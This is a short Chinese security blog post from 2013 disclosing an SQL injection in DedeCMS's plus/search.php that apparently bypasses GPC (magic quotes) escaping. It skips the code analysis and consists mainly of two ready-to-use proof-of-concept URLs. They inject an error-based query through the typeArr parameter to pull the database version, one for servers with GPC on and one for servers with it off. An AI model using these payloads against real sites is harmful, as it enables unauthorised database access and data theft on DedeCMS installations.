dedecms最新注入分析(可过gpc)

Author:唐门三少

代码分析省略。
PoC利用
在开启gpc的情况下

http://target/plus/search.php?typeArr[1%20or%20@`'`%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(substring((Select%20(version())),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20@`'`]=11&&kwtype=0&q=1111&searchtype=title

1111111111
在未开启gpc的情况下,虽然利用成功,但是在后面searchview的SQL语句检测中,会被mysqlids检测到,留下日志。

http://target/plus/search.php?typeArr[2'%20and%20@`'`%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(substring((Select%20(version())),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20']=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

222222222222222222

本文固定链接: https://www.unhonker.com/bug/901.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年01月20日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: dedecms最新注入分析(可过gpc) | 90' s Blog|关注网络信息安全
关键字:

dedecms最新注入分析(可过gpc):等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!